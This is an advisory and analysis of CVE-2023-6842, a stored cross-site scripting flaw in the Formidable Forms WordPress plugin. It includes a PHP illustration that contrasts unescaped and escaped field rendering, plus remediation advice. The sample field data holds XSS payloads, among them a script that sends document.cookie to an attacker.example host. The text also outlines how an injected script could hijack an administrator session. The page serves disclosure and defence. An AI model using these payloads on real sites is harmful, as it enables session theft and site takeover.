CVE-2023-6842 in Formidable Forms Plugin

Summary

by MITRE • 01/09/2024

The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field label and description field label parameter in all versions up to 6.7 (inclusive) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this only affects multi-site installations and installations where unfiltered_html has been disabled. However, in the formidable settings admins can extend form creation, deletion and other management permissions to other user types, which makes it possible for this vulnerability to be exploited by lower level user types as long as they have been granted the proper permissions.


Analysis

by VulDB Data Team • 04/11/2026

The vulnerability identified as CVE-2023-6842 affects the Formidable Forms plugin for WordPress, a widely used tool for creating various types of forms including contact forms, surveys, quizzes, and payment forms. This plugin has been installed on numerous WordPress sites across the internet, making it a potentially significant attack vector for malicious actors targeting WordPress environments. The vulnerability stems from inadequate input sanitization and output escaping mechanisms within the plugin's codebase, specifically affecting the name field label and description field label parameters. The flaw exists in all versions up to and including version 6.7, representing a substantial attack surface given the plugin's popularity and the prevalence of older versions in production environments.

Exploitation is a stored cross-site scripting attack: the payload is saved as part of the form definition and runs every time a browser renders a page containing the affected form. The attacker must be authenticated and, in a default installation, must hold administrator-level access to the Formidable form editor. That boundary moves when administrators use the Formidable settings to grant form creation, deletion and other management permissions to lower-level roles such as editors or authors; any role that has been granted those permissions can store the payload. The injection points are the label and the description of a form field, values that normally hold short customization text, so a malicious entry can sit inside an otherwise legitimate form configuration and is unlikely to be noticed during routine review.
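The following PHP is an added illustration of the CWE-79 pattern behind this CVE and of the output escaping WordPress provides; it is not Formidable's own code. The function names render_field_unsafe, render_field_safe and sanitize_label_on_save, the sample field with its payload, the attacker.example host and the shims for esc_html()/esc_attr() are assumptions made so the snippet runs outside WordPress; inside WordPress the real esc_html(), esc_attr() and wp_kses() are used.

```php
<?php
// Added example, not code from the Formidable Forms plugin.
// Stand-alone shims: WordPress already defines esc_html()/esc_attr().
// Assumption: these shims are only ever hit when run outside WordPress.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed field definition of the kind a form builder stores. A user
// with form-edit rights has saved script in the label and the description.
$field = [
    'id'          => 17,
    'name'        => 'Email <img src=x onerror="alert(document.cookie)">',
    'description' => 'We reply within a day<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
];

// Vulnerable pattern: stored label and description are concatenated into
// markup with no escaping, so the browser executes whatever was saved.
function render_field_unsafe(array $f): string {
    return '<label for="field_' . $f['id'] . '" title="' . $f['name'] . '">' . $f['name'] . '</label>'
         . '<div class="frm_description">' . $f['description'] . '</div>';
}

// Hardened pattern: escape for the context the value lands in.
// esc_html() for element content, esc_attr() inside an attribute value,
// and an integer cast on the id so it cannot smuggle extra attributes.
function render_field_safe(array $f): string {
    $id = (int) $f['id'];
    return '<label for="field_' . $id . '" title="' . esc_attr($f['name']) . '">'
         . esc_html($f['name']) . '</label>'
         . '<div class="frm_description">' . esc_html($f['description']) . '</div>';
}

// Defence in depth: also sanitize at save time. Inside WordPress wp_kses()
// with a minimal allow-list keeps simple formatting and drops script and
// event-handler attributes; outside WordPress fall back to plain text.
function sanitize_label_on_save(string $label): string {
    if (function_exists('wp_kses')) {
        return wp_kses($label, ['strong' => [], 'em' => [], 'br' => []]);
    }
    return strip_tags($label);
}

$unsafe = render_field_unsafe($field);
$safe   = render_field_safe($field);

echo "UNSAFE:\n$unsafe\n\nSAFE:\n$safe\n\n";
echo 'script tag present in unsafe render: ' . (strpos($unsafe, '<script>') !== false ? 'yes' : 'no') . "\n";
echo 'script tag present in safe render:   ' . (strpos($safe, '<script>') !== false ? 'yes' : 'no') . "\n";
echo 'description after save-time sanitizing: ' . sanitize_label_on_save($field['description']) . "\n";
```

Output escaping is the fix that actually closes the hole: the same stored value is rendered as literal text in the label and as a quoted attribute in title, and each context needs its own escaping function. Save-time sanitizing alone is not enough, because data already in the database, or written through another code path, still reaches the page unescaped.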

The impact depends on whose browser renders the stored script. In a visitor's session it can read cookies and tokens that are not marked HttpOnly, redirect to a phishing page or rewrite the form to capture what the visitor types. In an administrator's session, which is the likely outcome since administrators preview and edit forms, the script acts with the administrator's privileges and can create a new administrator account, edit plugin or theme files or install a backdoor, amounting to full control of the site. Because the payload is stored, it fires for every user who loads the affected form until the field is cleaned, so a single injection affects many users over time. The unfiltered_html capability explains the default exposure. In a single-site installation, administrators already hold unfiltered_html and may legitimately save arbitrary HTML, so the missing escaping grants them nothing new. In a multi-site installation, site administrators do not have unfiltered_html (only the network super admin does), and the same applies to single-site installations where unfiltered_html has been disabled, for example through the DISALLOW_UNFILTERED_HTML constant in wp-config.php. In both of those configurations the plugin lets a user store script that WordPress core would otherwise strip, and that is the boundary this CVE crosses.

Security practitioners should recognize this vulnerability as a classic example of CWE-79, Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting"), a weakness that has been documented for decades. In ATT&CK terms the injected payload is browser-side script, so the relevant technique is T1059.007, Command and Scripting Interpreter: JavaScript, rather than a server-side interpreter; any further compromise of the host would come from what that script does with the victim's WordPress session. Organizations should update Formidable Forms to a release later than 6.7, review which roles have been granted form management permissions in the Formidable settings and restrict them to the administrators who need them, and audit existing form fields for labels or descriptions containing script tags, event-handler attributes or javascript: URLs to determine whether the flaw has already been used. The vulnerability highlights the importance of proper input validation and context-aware output escaping in web applications, particularly in plugins that store user-supplied configuration and later render it. Regular security audits and vulnerability assessments should be conducted to identify similar weaknesses in other WordPress plugins and themes, since the size of the WordPress plugin ecosystem makes such vulnerabilities common and damaging when exploited at scale.

Responsible: Wordfence
Reservation: 12/15/2023
Disclosure: 01/09/2024
Moderation: accepted
CPE: ready
EPSS: 0.00316
KEV: no
Activities: very low
